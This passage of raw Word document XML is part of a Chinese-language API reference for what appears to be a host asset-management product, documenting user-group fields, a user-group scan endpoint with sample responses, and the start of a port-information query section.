      <w:tr w:rsidR="00497C54" w14:paraId="5B11F7F8" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B70591E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>externalIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5017D35A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D13FC7C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42CA0441" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>外网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2275CBB9" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B62D470" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>internalIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="797CA360" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D94A026" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09D09877" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>内网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="40A593B0" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C153E6B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bizGroupId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="760849E9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="370874F1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bigint(20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A7B20C9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="10E6E002" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B1FAA85" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bizGroup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78DD7326" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="629779E8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="682C91EB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="018593CE" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="042C54F8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33C44FF6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D3C6E1B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6258BE33" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2FFF5BAE" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C84012D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostTagList</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F2E1627" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5614D6D2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78820B7B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="584CB5AC" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="726CEE8F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5808E7AC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68AC97E9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="404CAB19" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="65DFB34B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11E26E4A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36ADC874" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43EFCD20" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="619D2D4C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>用户组名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="36CB5073" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51EE39A8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>gid</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B26D413" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5BA2A1E9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bigint(20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="092A4CA7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>用户组id（仅支持linux）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5EA8045E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30DA24F1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>members</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3BC8113C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="054A02EB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>name ：varchar(128) type：tinyint(4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="035E95DD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>组成员，仅windows name: 用户名 type: 用户类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4E88528C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6EBC761E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F0C5349" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26E3F110" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11A3A89D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>用户组描述，仅windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5ED39196" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="用户组信息扫描"/>
      <w:bookmarkEnd w:id="29"/>
      <w:r>
        <w:t>用户组信息扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75850154" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口用于请求系统账号信息扫描，更新数据查询的结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A90EB8E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A959C2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/api/assets/accountgroup/{win|linux}/refresh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE56A01" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F206C06" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>无</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DCFCD7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDCBC12" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>/external/api/assets/accountgroup/linux/refresh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6827AA98" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C881ED" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    id: "some job id"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2D52D7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>如果无在线agent返回：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CFD19C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "errorCode": 500,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "errorMessage": "no online agent", //      错误描述</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "detail":null</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A8F66F"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26EB615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402D2F8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B645B59" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4411247F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60B1FAB2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="020C7778" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F024F47" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06A81643" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="796AB60B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DD6BC8F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>扫描任务ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="334FEEF1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="用户组信息查询扫描状态"/>
      <w:bookmarkEnd w:id="30"/>
      <w:r>
        <w:t>用户组信息查询扫描状态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8E5DCF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>用于查询系统用户组信息的扫描状态；具体请求方式参照3.1。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB198E8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="端口信息"/>
      <w:bookmarkEnd w:id="28"/>
      <w:bookmarkEnd w:id="31"/>
      <w:r>
        <w:t>端口信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6443B36D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>用于查询系统端口，将按每台主机每个端口展示；每条数据均包含主机信息，您可以灵活的使用该接口组合出任何需要的显示结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144750D0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>功能描述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF40AD7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该功能API用于查询资产中的端口信息，获取查询的结果并展示；每条数据均包含主机信息，您可以灵活的使用该API组合出任何需要的显示结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43509453" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>功能使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0557132A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>端口信息查询有两种方式：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7886F205" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>直接获取当前信息；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFF99C2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>更新数据后，再获取最新信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BA8FB4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>为了满足上述功能，我们提供了三个接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B27B957" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>端口信息查询结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFE2D5A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>端口信息扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1E9B01" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>端口信息查询扫描状态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202D4FE1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>使用方法如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055E2E67" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>直接查询当前信息则直接调用端口信息查询结果接口（即1号接口）；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0926D9B9"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327B3971" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>接口的调用方法、参数和返回信息等具体如下所示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C577679" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="端口信息查询结果"/>
      <w:r>
        <w:t>端口信息查询结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0268D24F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口用于查询端口信息，按每台主机每个端口进行展示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A58C5B8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA5CCFC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/api/assets/port/{linux|win}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B59F4E"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519"/>
        <w:gridCol w:w="1339"/>
        <w:gridCol w:w="630"/>
        <w:gridCol w:w="2110"/>
